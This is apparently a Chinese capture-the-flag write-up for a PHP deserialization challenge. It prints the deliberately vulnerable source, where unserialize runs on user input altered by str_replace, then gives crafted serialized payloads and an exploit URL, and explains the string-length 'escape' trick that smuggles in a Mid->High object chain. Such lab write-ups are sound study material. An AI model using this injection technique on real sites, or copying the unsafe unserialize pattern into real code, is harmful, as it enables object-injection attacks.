第三届山城杯------反序列化

<?php @include 'common_ui.inc';?>
<?php
class Low{
    public $user1;
    public $user2;
    function __construct($a, $b){
        //$this->user1 = &$mid;
        $this->user1 = $a;
        //$this -> user1 = new Mid();
        $this->user2 = $b;
        //$this->user2 = New Mid;
    }
}

class Mid{
    public $mid;
    function __destruct(){
        $high = 'nice,'.$this->mid;
        echo $high;
    }
}

class High{
    public $high;
    function __toString(){
        //flag.php
        //include "flag.php";
        echo 'zhixing High<br>';
        if($this->high=='flag.php')
        {
            echo 'flag';
            echo "<br/>";
        }
        return 'good job'.$high.'+';
    }
}
$num;
function pr($str){
    echo '<br>';
    $num += 1;
    echo $num.':::'.$str;
    echo '<br><br>';
}
class Test{
    public $user_1;
    public $user_2;
    function __construct(){
        $user_1 = new Mid;
        $user_2 = "123";
        echo $high;
    }
}
if(isset($_GET['a'])&&isset($_GET['b']))
{
    $num = 0;
    $a = new Low($_GET['a'],$_GET['b']);
    $b = unserialize(str_replace('******', chr(0) . '$' , serialize($a)));
    //pr(serialize($a));
    //pr(str_replace("******",chr(0).'$',serialize($a)));
    //$test;
    //echo'-----------------------------<br>';
    //pr(serialize($a));
    //pr(serialize($b));
    
    //echo'-----------------------------<br>';
    /*
    $test = new Mid( );
    $test -> mid =new High ( );
    $test -> mid ->high = "flag.php";
    */
    //$test = unserialize('O:3:"Low":2:{s:5:"user1";s:4:"1111";s:5:"user2";O:3:"Mid":1:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";}}}');
    //pr(serialize($test));
    //$test = unserialize('O:3:"Mid":2:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";};}');
    //pr(serialize($test));
    //echo $test;
}
else
{
    //highlight_file("./index.php");
}
echo '<br>'."on".'<br>';
//O:3:"Mid":1:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";}}
//O:3:"Low":2:{s:5:"user1";s:3:"111";s:5:"user2";O:3:"Mid":1:{s:3:"mid";N;}}
/*http://127.0.0.1/buu/test.php
?a=1111";s:5:"user2";O:3:"Mid":2:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";};}
&b=111
*/
?>

这题感觉真的好可惜，事后看wp就差一点点就做出来了，脑子没拐过弯

代码分析

函数:

__toString() 当此类别当作字符串是便会调用此函数

我们因为传参只能传给Low
所以我们函数调用要通过 Low--> Mid --> High 的链条传过去
而我们要调用的便是

O:3:"Mid":1:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";}}

的反序列化

实际操作

我们想办法把调用的序列化传给user2，因为会多出来

";s:5:"user2";s:79:"

所以我们构造(20个)把它吃掉
赛场上一直想传参给user1然后找办法让*****所占字符变多，一直没做出来，太难受了